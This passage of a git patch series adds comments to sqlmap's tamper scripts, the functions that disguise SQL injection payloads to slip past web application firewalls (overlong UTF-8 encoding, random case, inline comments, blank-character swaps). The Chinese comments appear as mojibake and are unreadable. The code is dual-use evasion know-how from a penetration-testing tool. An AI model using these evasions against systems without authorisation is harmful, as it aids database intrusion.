random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal) + # 瀵逛簬鍚庨潰绱ц窡鐫鎷彿鐨勫叧閿瓧锛屽彧娣诲姞宸﹁竟鐨勭┖鏍 retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal) return retVal diff --git a/src/sqlmap-master/tamper/ord2ascii.py b/src/sqlmap-master/tamper/ord2ascii.py index f5cf8a2..2277fc1 100644 --- a/src/sqlmap-master/tamper/ord2ascii.py +++ b/src/sqlmap-master/tamper/ord2ascii.py @@ -28,6 +28,8 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忓皢鎵鏈夌殑ORD()鍑芥暟璋冪敤鏇挎崲涓篈SCII()鍑芥暟璋冪敤 + # 姝e垯琛ㄨ揪寮(?i)\bORD\( 鍖归厤ORD鍏抽敭瀛楋紝蹇界暐澶у皬鍐欙紝骞朵笖纭繚鏄畬鏁寸殑鍗曡瘝杈圭晫 retVal = re.sub(r"(?i)\bORD\(", "ASCII(", payload) return retVal diff --git a/src/sqlmap-master/tamper/overlongutf8.py b/src/sqlmap-master/tamper/overlongutf8.py index 5945356..9fcd81b 100644 --- a/src/sqlmap-master/tamper/overlongutf8.py +++ b/src/sqlmap-master/tamper/overlongutf8.py @@ -32,14 +32,19 @@ def tamper(payload, **kwargs): retVal = "" i = 0 + # 閬嶅巻payload涓殑姣忎釜瀛楃 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%锛屽苟涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛屽垯璁や负杩欐槸涓涓凡缁忕紪鐮佺殑瀛楃 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: + # 濡傛灉褰撳墠瀛楃涓嶆槸瀛楁瘝鎴栨暟瀛楋紝鍒欏皢鍏惰浆鎹负overlong UTF8缂栫爜 if payload[i] not in (string.ascii_letters + string.digits): + # 璁$畻骞舵坊鍔爋verlong UTF8缂栫爜 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) else: + # 濡傛灉鏄瓧姣嶆垨鏁板瓧锛屽垯鐩存帴娣诲姞鍒扮粨鏋滀腑 retVal += payload[i] i += 1 diff --git a/src/sqlmap-master/tamper/overlongutf8more.py b/src/sqlmap-master/tamper/overlongutf8more.py index e713745..fd5a7d0 100644 --- a/src/sqlmap-master/tamper/overlongutf8more.py +++ b/src/sqlmap-master/tamper/overlongutf8more.py @@ -33,10 +33,13 @@ def tamper(payload, **kwargs): i = 0 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%锛屽苟涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛屽垯璁や负杩欐槸涓涓凡缁忕紪鐮佺殑瀛楃 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: + # 灏嗗綋鍓嶅瓧绗﹁浆鎹负overlong UTF8缂栫爜 + # 姣忎釜瀛楃琚紪鐮佷负涓や釜瀛楄妭锛岀涓涓瓧鑺傜殑楂樹綅璁剧疆涓10锛0xC0锛夛紝绗簩涓瓧鑺傜殑楂樹綅璁剧疆涓10锛0x80锛 retVal += "%%%.2X%%%.2X" % (0xc0 + (ord(payload[i]) >> 6), 0x80 + (ord(payload[i]) & 0x3f)) i += 1 diff --git a/src/sqlmap-master/tamper/percentage.py b/src/sqlmap-master/tamper/percentage.py index 9d62e60..3b772b1 100644 --- a/src/sqlmap-master/tamper/percentage.py +++ b/src/sqlmap-master/tamper/percentage.py @@ -13,7 +13,9 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庡湪杩愯tamper鑴氭湰鏃舵樉绀鸿鍛婁俊鎭 def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵笰SP web搴旂敤绋嬪簭 singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0]) def tamper(payload, **kwargs): @@ -40,10 +42,12 @@ def tamper(payload, **kwargs): i = 0 while i < len(payload): + # 濡傛灉褰撳墠瀛楃鏄%锛屽苟涓斿悗闈袱涓瓧绗︽槸鍗佸叚杩涘埗鏁板瓧锛屽垯璁や负杩欐槸涓涓凡缁忕紪鐮佺殑瀛楃 if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 elif payload[i] != ' ': + # 濡傛灉褰撳墠瀛楃涓嶆槸绌烘牸锛屽垯鍦ㄥ叾鍓嶉潰娣诲姞鐧惧垎鍙 retVal += '%%%s' % payload[i] i += 1 else: diff --git a/src/sqlmap-master/tamper/plus2concat.py b/src/sqlmap-master/tamper/plus2concat.py index 3b910f8..2499c81 100644 --- a/src/sqlmap-master/tamper/plus2concat.py +++ b/src/sqlmap-master/tamper/plus2concat.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import os import re +# 浠巗qlmap鐨勫簱涓鍏ュ崟娆¤鍛婃秷鎭嚱鏁般侀浂娣卞害鎼滅储鍑芥暟銆佹暟鎹簱绠$悊绯荤粺鏋氫妇鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch from lib.core.enums import DBMS @@ -16,6 +17,7 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂icrosoft SQL Server鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -41,15 +43,20 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔悳绱ayload涓敱'+'杩炴帴鐨凜HAR()鍑芥暟鎴栧崟寮曞彿瀛楃涓 match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) if match: part = match.group(0) + # 灏嗗尮閰嶇殑閮ㄥ垎鎷嗗垎涓哄瓧绗﹀垪琛 chars = [char for char in part] + # 浣跨敤zeroDepthSearch鍑芥暟鎵惧埌鎵鏈夌殑'+'瀛楃浣嶇疆 for index in zeroDepthSearch(part, '+'): + # 灏'+'瀛楃鏇挎崲涓','瀛楃 chars[index] = ',' - + # 鏋勯燙ONCAT鍑芥暟鐨勫瓧绗︿覆琛ㄧず replacement = "CONCAT(%s)" % "".join(chars) + # 灏嗗師濮嬬殑鐢'+'杩炴帴鐨勯儴鍒嗘浛鎹负CONCAT鍑芥暟 retVal = retVal.replace(part, replacement) return retVal diff --git a/src/sqlmap-master/tamper/plus2fnconcat.py b/src/sqlmap-master/tamper/plus2fnconcat.py index ab1005a..8d8ce60 100644 --- a/src/sqlmap-master/tamper/plus2fnconcat.py +++ b/src/sqlmap-master/tamper/plus2fnconcat.py @@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission import os import re +# 浠巗qlmap鐨勫簱涓鍏ュ崟娆¤鍛婃秷鎭嚱鏁般侀浂娣卞害鎼滅储鍑芥暟銆佸吋瀹规ā鍧椾腑鐨剎range鍑芥暟銆佹暟鎹簱绠$悊绯荤粺鏋氫妇鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import singleTimeWarnMessage from lib.core.common import zeroDepthSearch from lib.core.compat import xrange @@ -17,6 +18,7 @@ from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): + # 鏄剧ず鍗曟璀﹀憡娑堟伅锛屽憡鐭ョ敤鎴疯繖涓猼amper鑴氭湰鍙拡瀵筂icrosoft SQL Server鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -43,22 +45,26 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔悳绱ayload涓敱'+'杩炴帴鐨凜HAR()鍑芥暟鎴栧崟寮曞彿瀛楃涓 match = re.search(r"('[^']+'|CHAR\(\d+\))\+.*(?<=\+)('[^']+'|CHAR\(\d+\))", retVal) if match: old = match.group(0) parts = [] last = 0 + # 浣跨敤zeroDepthSearch鍑芥暟鎵惧埌鎵鏈夌殑'+'瀛楃浣嶇疆 for index in zeroDepthSearch(old, '+'): + # 灏嗘瘡涓'+'瀛楃涔嬮棿鐨勯儴鍒嗕綔涓哄崟鐙殑閮ㄥ垎瀛樺偍 parts.append(old[last:index].strip('+')) last = index - + # 灏嗘渶鍚庝竴涓'+'瀛楃涔嬪悗鐨勯儴鍒嗕篃鍔犲叆鍒皃arts鍒楄〃涓 parts.append(old[last:].strip('+')) replacement = parts[0] + # 閬嶅巻parts鍒楄〃锛屾瀯閫爗fn CONCAT()}鍑芥暟鐨勫祵濂楄皟鐢 for i in xrange(1, len(parts)): replacement = "{fn CONCAT(%s,%s)}" % (replacement, parts[i]) - + # 灏嗗師濮嬬殑鐢'+'杩炴帴鐨勯儴鍒嗘浛鎹负{fn CONCAT()}鍑芥暟 retVal = retVal.replace(old, replacement) return retVal diff --git a/src/sqlmap-master/tamper/randomcase.py b/src/sqlmap-master/tamper/randomcase.py index 8cb02a8..5a48763 100644 --- a/src/sqlmap-master/tamper/randomcase.py +++ b/src/sqlmap-master/tamper/randomcase.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission import re +# 浠巗qlmap鐨勫簱涓鍏ラ殢鏈鸿寖鍥村嚱鏁般佸吋瀹规ā鍧椾腑鐨剎range鍑芥暟銆佺煡璇嗗簱鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import randomRange from lib.core.compat import xrange from lib.core.data import kb @@ -48,19 +49,22 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔壘鍒皃ayload涓殑鎵鏈夊叧閿瓧锛堣嚦灏戜袱涓瓧姣嶆垨涓嬪垝绾跨殑鍗曡瘝锛 for match in re.finditer(r"\b[A-Za-z_]{2,}\b", retVal): word = match.group() - + # 濡傛灉鍗曡瘝鏄疭QL鍏抽敭瀛楋紝骞朵笖涓嶆槸琚紩鍙锋垨鎷彿鍖呭洿鐨勶紝鎴栬呮槸涓涓嚱鏁板悕 if (word.upper() in kb.keywords and re.search(r"(?i)[`\"'\[]%s[`\"'\]]" % word, retVal) is None) or ("%s(" % word) in payload: + # 鐢熸垚涓涓殢鏈哄ぇ灏忓啓娣峰悎鐨勫崟璇 while True: _ = "" for i in xrange(len(word)): + # 闅忔満閫夋嫨澶у啓鎴栧皬鍐 _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - + # 纭繚鐢熸垚鐨勫崟璇嶄笉鏄叏澶у啓鎴栧叏灏忓啓锛屽苟閫鍑哄惊鐜 if len(_) > 1 and _ not in (_.lower(), _.upper()): break - + # 灏嗗師濮嬬殑鍗曡瘝鏇挎崲涓洪殢鏈哄ぇ灏忓啓娣峰悎鐨勫崟璇 retVal = retVal.replace(word, _) return retVal diff --git a/src/sqlmap-master/tamper/space2morehash.py b/src/sqlmap-master/tamper/space2morehash.py index 091bb9b..8df3c21 100644 --- a/src/sqlmap-master/tamper/space2morehash.py +++ b/src/sqlmap-master/tamper/space2morehash.py @@ -20,6 +20,10 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS __priority__ = PRIORITY.LOW def dependencies(): + """ + 妫鏌ユ槸鍚︽弧瓒宠剼鏈繍琛岀殑鏉′欢 + """ + # 杈撳嚭璀﹀憡淇℃伅锛屾彁绀簍amper鑴氭湰鍙傜敤浜嶮ySQL鐗堟湰澶т簬5.1.13 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -43,9 +47,13 @@ def tamper(payload, **kwargs): """ def process(match): + """ + 澶勭悊鍖归厤鍒扮殑鍗曡瘝 + """ word = match.group('word') randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) + # 濡傛灉鍖归厤鍒扮殑鍗曡瘝鍦ㄥ叧閿瘝鍒楄〃涓紝骞朵笖涓嶅湪蹇界暐绌烘牸褰卞搷鐨勫叧閿瘝鍒楄〃涓紝鍒欐浛鎹负闅忔満瀛楃涓 if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) else: @@ -53,16 +61,21 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload瀛樺湪锛屽垯杩涜鏇挎崲 if payload: payload = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, payload) + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍硷紝鍒欐浛鎹负闅忔満瀛楃涓 if payload[i].isspace(): randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸--锛屽垯灏唒ayload涓墿浣欑殑瀛楃娣诲姞鍒皉etVal涓紝骞惰烦鍑哄惊鐜 elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break + # 鍚﹀垯灏嗗瓧绗︽坊鍔犲埌retVal涓 else: retVal += payload[i] diff --git a/src/sqlmap-master/tamper/space2mssqlblank.py b/src/sqlmap-master/tamper/space2mssqlblank.py index 5f055c8..7055f60 100644 --- a/src/sqlmap-master/tamper/space2mssqlblank.py +++ b/src/sqlmap-master/tamper/space2mssqlblank.py @@ -8,14 +8,20 @@ See the file 'LICENSE' for copying permission import os import random +# 瀵煎叆lib.core.common妯″潡涓殑singleTimeWarnMessage鍑芥暟 from lib.core.common import singleTimeWarnMessage +# 瀵煎叆lib.core.compat妯″潡涓殑xrange鍑芥暟 from lib.core.compat import xrange +# 瀵煎叆lib.core.enums妯″潡涓殑DBMS鏋氫妇 from lib.core.enums import DBMS +# 瀵煎叆lib.core.enums妯″潡涓殑PRIORITY鏋氫妇 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW +# 瀹氫箟涓涓嚱鏁帮紝鐢ㄤ簬妫鏌ヨ剼鏈緷璧 def dependencies(): + # 杈撳嚭璀﹀憡淇℃伅锛岃鏄庤鑴氭湰鍙兘鐢ㄤ簬鐗瑰畾鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL)) def tamper(payload, **kwargs): @@ -53,29 +59,38 @@ def tamper(payload, **kwargs): # CR 0D carriage return # SO 0E shift out # SI 0F shift in + # 瀹氫箟涓涓厓缁勶紝鍖呭惈涓浜涘瓧绗︿覆 blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A') + # 灏唒ayload璧嬪肩粰retVal retVal = payload if payload: retVal = "" quote, doublequote, firstspace, end = False, False, False, False + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉褰撳墠瀛楃涓嶆槸绌烘牸锛屽垯灏唂irstspace璁剧疆涓篢rue if not firstspace: if payload[i].isspace(): firstspace = True + # 鍦╮etVal涓坊鍔犱竴涓殢鏈洪夋嫨鐨勭┖鏍 retVal += random.choice(blanks) continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿锛屽垯灏唓uote鍙栧弽 elif payload[i] == '\'': quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿锛屽垯灏哾oublequote鍙栧弽 elif payload[i] == '"': doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄#鎴栬--锛屽垯灏唀nd璁剧疆涓篢rue elif payload[i] == '#' or payload[i:i + 3] == '-- ': end = True + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝涓斾笉鏄湪鍙屽紩鍙锋垨鍗曞紩鍙蜂腑锛屽垯鏍规嵁end鐨勫兼坊鍔犱竴涓殢鏈洪夋嫨鐨勭┖鏍 elif payload[i] == " " and not doublequote and not quote: if end: retVal += random.choice(blanks[:-1]) @@ -84,6 +99,7 @@ def tamper(payload, **kwargs): continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] return retVal diff --git a/src/sqlmap-master/tamper/space2mssqlhash.py b/src/sqlmap-master/tamper/space2mssqlhash.py index 67e31e6..64788a8 100644 --- a/src/sqlmap-master/tamper/space2mssqlhash.py +++ b/src/sqlmap-master/tamper/space2mssqlhash.py @@ -27,14 +27,24 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload涓嶄负绌 if payload: + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏%23%0A娣诲姞鍒皉etVal涓 retVal += "%23%0A" + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload鐨勫墿浣欓儴鍒嗘坊鍔犲埌retVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯 else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/space2mysqlblank.py b/src/sqlmap-master/tamper/space2mysqlblank.py index 399370c..ef81d36 100644 --- a/src/sqlmap-master/tamper/space2mysqlblank.py +++ b/src/sqlmap-master/tamper/space2mysqlblank.py @@ -43,30 +43,50 @@ def tamper(payload, **kwargs): # CR 0D carriage return # VT 0B vertical TAB (MySQL and Microsoft SQL Server only) # A0 non-breaking space + # 瀹氫箟涓涓寘鍚壒娈婂瓧绗︾殑鍏冪粍 blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%A0') + # 灏唒ayload璧嬪肩粰retVal retVal = payload + # 濡傛灉payload涓嶄负绌 if payload: + # 灏唕etVal缃负绌哄瓧绗︿覆 retVal = "" + # 瀹氫箟涓変釜甯冨皵鍙橀噺锛屽垎鍒〃绀烘槸鍚﹀湪寮曞彿鍐呫佸弻寮曞彿鍐呭拰绗竴涓┖鏍 quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉绗竴涓┖鏍间负鍋 if not firstspace: + # 濡傛灉褰撳墠瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏嗙涓涓┖鏍肩疆涓虹湡 firstspace = True + # 灏嗕竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗︽坊鍔犲埌retVal涓 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 濡傛灉褰撳墠瀛楃鏄崟寮曞彿 elif payload[i] == '\'': + # 灏唓uote鍙栧弽 quote = not quote + # 濡傛灉褰撳墠瀛楃鏄弻寮曞彿 elif payload[i] == '"': + # 灏哾oublequote鍙栧弽 doublequote = not doublequote + # 濡傛灉褰撳墠瀛楃鏄┖鏍硷紝涓斾笉鍦ㄥ弻寮曞彿鍐呭拰鍗曞紩鍙峰唴 elif payload[i] == " " and not doublequote and not quote: + # 灏嗕竴涓殢鏈洪夋嫨鐨勭壒娈婂瓧绗︽坊鍔犲埌retVal涓 retVal += random.choice(blanks) + # 缁х画涓嬩竴娆″惊鐜 continue + # 灏嗗綋鍓嶅瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal diff --git a/src/sqlmap-master/tamper/space2mysqldash.py b/src/sqlmap-master/tamper/space2mysqldash.py index 7b64776..deffbff 100644 --- a/src/sqlmap-master/tamper/space2mysqldash.py +++ b/src/sqlmap-master/tamper/space2mysqldash.py @@ -7,14 +7,20 @@ See the file 'LICENSE' for copying permission import os +# 浠巐ib.core.common妯″潡涓鍏ingleTimeWarnMessage鍑芥暟 from lib.core.common import singleTimeWarnMessage +# 浠巐ib.core.compat妯″潡涓鍏range鍑芥暟 from lib.core.compat import xrange +# 浠巐ib.core.enums妯″潡涓鍏BMS鏋氫妇鍜孭RIORITY鏋氫妇 from lib.core.enums import DBMS from lib.core.enums import PRIORITY +# 璁剧疆鑴氭湰鐨勪紭鍏堢骇涓篖OW __priority__ = PRIORITY.LOW +# 瀹氫箟dependencies鍑芥暟锛岀敤浜庢鏌ヨ剼鏈緷璧 def dependencies(): + # 杈撳嚭璀﹀憡淇℃伅锛岃鏄庤鑴氭湰鍙兘鐢ㄤ簬MySQL鏁版嵁搴 singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): @@ -34,14 +40,24 @@ def tamper(payload, **kwargs): retVal = "" + # 濡傛灉payload涓嶄负绌 if payload: + # 閬嶅巻payload鐨勬瘡涓瓧绗 for i in xrange(len(payload)): + # 濡傛灉瀛楃鏄┖鏍 if payload[i].isspace(): + # 灏"--%0A"娣诲姞鍒皉etVal涓 retVal += "--%0A" + # 濡傛灉瀛楃鏄#鎴栬呭瓧绗︽槸-- elif payload[i] == '#' or payload[i:i + 3] == '-- ': + # 灏唒ayload鐨勫墿浣欓儴鍒嗘坊鍔犲埌retVal涓 retVal += payload[i:] + # 璺冲嚭寰幆 break + # 鍚﹀垯 else: + # 灏嗗瓧绗︽坊鍔犲埌retVal涓 retVal += payload[i] + # 杩斿洖retVal return retVal From 01d9031e655358e3482dc3514dca07999fa7ac63 Mon Sep 17 00:00:00 2001 From: sck <2238502556@qq.com> Date: Mon, 30 Dec 2024 10:28:11 +0800 Subject: [PATCH 9/9] sck --- src/sqlmap-master/tamper/randomcomments.py | 15 ++++++++++----- src/sqlmap-master/tamper/schemasplit.py | 3 ++- src/sqlmap-master/tamper/scientific.py | 4 +++- src/sqlmap-master/tamper/sleep2getlock.py | 1 + src/sqlmap-master/tamper/sp_password.py | 3 +++ src/sqlmap-master/tamper/space2comment.py | 14 ++++++++------ src/sqlmap-master/tamper/space2dash.py | 16 ++++++++++++++-- src/sqlmap-master/tamper/space2hash.py | 13 +++++++++++++ src/sqlmap-master/tamper/space2morecomment.py | 6 ++++++ 9 files changed, 60 insertions(+), 15 deletions(-) diff --git a/src/sqlmap-master/tamper/randomcomments.py b/src/sqlmap-master/tamper/randomcomments.py index edf4cba..b0963a3 100644 --- a/src/sqlmap-master/tamper/randomcomments.py +++ b/src/sqlmap-master/tamper/randomcomments.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission import re +# 浠巗qlmap鐨勫簱涓鍏ラ殢鏈鸿寖鍥村嚱鏁般佸吋瀹规ā鍧椾腑鐨剎range鍑芥暟銆佺煡璇嗗簱鍜屼紭鍏堢骇鏋氫妇 from lib.core.common import randomRange from lib.core.compat import xrange from lib.core.data import kb @@ -27,24 +28,28 @@ def tamper(payload, **kwargs): retVal = payload if payload: + # 浣跨敤姝e垯琛ㄨ揪寮忔壘鍒皃ayload涓殑鎵鏈夊崟璇嶏紙鑷冲皯涓涓瓧姣嶆垨涓嬪垝绾匡級 for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() + # 璺宠繃闀垮害灏忎簬2鐨勫崟璇 if len(word) < 2: continue + # 濡傛灉鍗曡瘝鏄疭QL鍏抽敭瀛 if word.upper() in kb.keywords: - _ = word[0] - + _ = word[0] # 浠庡崟璇嶇殑绗竴涓瓧绗﹀紑濮嬫瀯閫犳柊鐨勫瓧绗︿覆 + # 閬嶅巻鍗曡瘝鐨勬瘡涓瓧绗︼紙闄や簡绗竴涓拰鏈鍚庝竴涓級 for i in xrange(1, len(word) - 1): + # 闅忔満鍐冲畾鏄惁鎻掑叆娉ㄩ噴 _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) - + # 娣诲姞鍗曡瘝鐨勬渶鍚庝竴涓瓧绗 _ += word[-1] - + # 濡傛灉娌℃湁鎻掑叆浠讳綍娉ㄩ噴锛屽垯闅忔満閫夋嫨涓涓綅缃彃鍏ユ敞閲 if "/**/" not in _: index = randomRange(1, len(word) - 1) _ = word[:index] + "/**/" + word[index:] - + # 灏嗗師濮嬬殑鍗曡瘝鏇挎崲涓烘彃鍏ヤ簡娉ㄩ噴鐨勬柊瀛楃涓 retVal = retVal.replace(word, _) return retVal diff --git a/src/sqlmap-master/tamper/schemasplit.py b/src/sqlmap-master/tamper/schemasplit.py index 07ad37d..8245f08 100644 --- a/src/sqlmap-master/tamper/schemasplit.py +++ b/src/sqlmap-master/tamper/schemasplit.py @@ -27,5 +27,6 @@ def tamper(payload, **kwargs): >>> tamper('SELECT id FROM testdb.users') 'SELECT id FROM testdb 9.e.users' """ - + # 濡傛灉payload涓嶄负绌猴紝鍒欎娇鐢ㄦ鍒欒〃杈惧紡鏇挎崲FROM鍚庨潰鏁版嵁搴撹〃鍚嶇殑鐐规搷浣滅涓轰竴涓┖鏍煎姞涓'9.e.' + # 杩欐槸涓绉嶇粫杩囨煇浜沇AF瑙勫垯鐨勬妧鏈紝閫氳繃鎻掑叆涓涓湅浼兼棤瀹崇殑瀛楃涓'9.e.'鏉ュ垎鍓叉暟鎹簱鍚嶅拰琛ㄥ悕 return re.sub(r"(?i)( FROM \w+)\.(\w+)", r"\g<1> 9.e.\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/scientific.py b/src/sqlmap-master/tamper/scientific.py index 9b0ecf7..514b582 100644 --- a/src/sqlmap-master/tamper/scientific.py +++ b/src/sqlmap-master/tamper/scientific.py @@ -29,7 +29,9 @@ def tamper(payload, **kwargs): """ if payload: + # 灏嗛棴鍚堟嫭鍙枫侀楀彿銆佺偣銆佹槦鍙枫佹鏂滄潬銆佸弽鏂滄潬銆佺珫绾裤佷綅杩愮畻绗﹀拰閫昏緫杩愮畻绗︽浛鎹负" 1.e" + 鍘熷瓧绗 payload = re.sub(r"[),.*^/|&]", r" 1.e\g<0>", payload) + # 灏嗗嚱鏁板悕鍚庤窡宸︽嫭鍙锋浛鎹负" 鍑芥暟鍚 1.e("锛岄櫎闈炲嚱鏁板悕鏄疢ID銆丆AST銆丗ROM銆丆OUNT payload = re.sub(r"(\w+)\(", lambda match: "%s 1.e(" % match.group(1) if not re.search(r"(?i)\A(MID|CAST|FROM|COUNT)\Z", match.group(1)) else match.group(0), payload) # NOTE: MID and CAST don't work for sure - + # 杩斿洖淇敼鍚庣殑payload return payload diff --git a/src/sqlmap-master/tamper/sleep2getlock.py b/src/sqlmap-master/tamper/sleep2getlock.py index f0b3a54..a3e35e1 100644 --- a/src/sqlmap-master/tamper/sleep2getlock.py +++ b/src/sqlmap-master/tamper/sleep2getlock.py @@ -34,6 +34,7 @@ def tamper(payload, **kwargs): """ if payload: + # 灏唒ayload涓殑'SLEEP('鏇挎崲涓'GET_LOCK('%s',锛屽叾涓'%s'浼氳kb.aliasName鏇挎崲 payload = payload.replace("SLEEP(", "GET_LOCK('%s'," % kb.aliasName) return payload diff --git a/src/sqlmap-master/tamper/sp_password.py b/src/sqlmap-master/tamper/sp_password.py index d23c0d5..30cc2bf 100644 --- a/src/sqlmap-master/tamper/sp_password.py +++ b/src/sqlmap-master/tamper/sp_password.py @@ -27,6 +27,9 @@ def tamper(payload, **kwargs): retVal = "" if payload: + # 鏋勯犺繑鍥炵殑payload瀛楃涓 + # 濡傛灉payload涓凡缁忓寘鍚敞閲婄鍙('#'鎴'--')锛屽垯鐩存帴娣诲姞sp_password鍑芥暟 + # 鍚﹀垯锛屽湪sp_password鍓嶆坊鍔犱竴涓'-- '浣滀负娉ㄩ噴 retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") return retVal diff --git a/src/sqlmap-master/tamper/space2comment.py b/src/sqlmap-master/tamper/space2comment.py index 3229a5c..231bb1b 100644 --- a/src/sqlmap-master/tamper/space2comment.py +++ b/src/sqlmap-master/tamper/space2comment.py @@ -4,7 +4,7 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ - +# 浠巗qlmap鐨勫簱涓鍏ュ吋瀹规ā鍧椾腑鐨剎range鍑芥暟鍜屼紭鍏堢骇鏋氫妇 from lib.core.compat import xrange from lib.core.enums import PRIORITY @@ -33,26 +33,28 @@ def tamper(payload, **kwargs): retVal = payload if payload: - retVal = "" + retVal = "" # 鍒濆鍖栧紩鍙风姸鎬佹爣璁 quote, doublequote, firstspace = False, False, False + # 閬嶅巻payload涓殑姣忎釜瀛楃 for i in xrange(len(payload)): + # 濡傛灉鏄涓涓┖鏍间笖涔嬪墠娌℃湁閬囧埌杩囩┖鏍 if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**/" continue - + # 濡傛灉鏄崟寮曞彿 elif payload[i] == '\'': quote = not quote - + # 濡傛灉鏄弻寮曞彿 elif payload[i] == '"': doublequote = not doublequote - + # 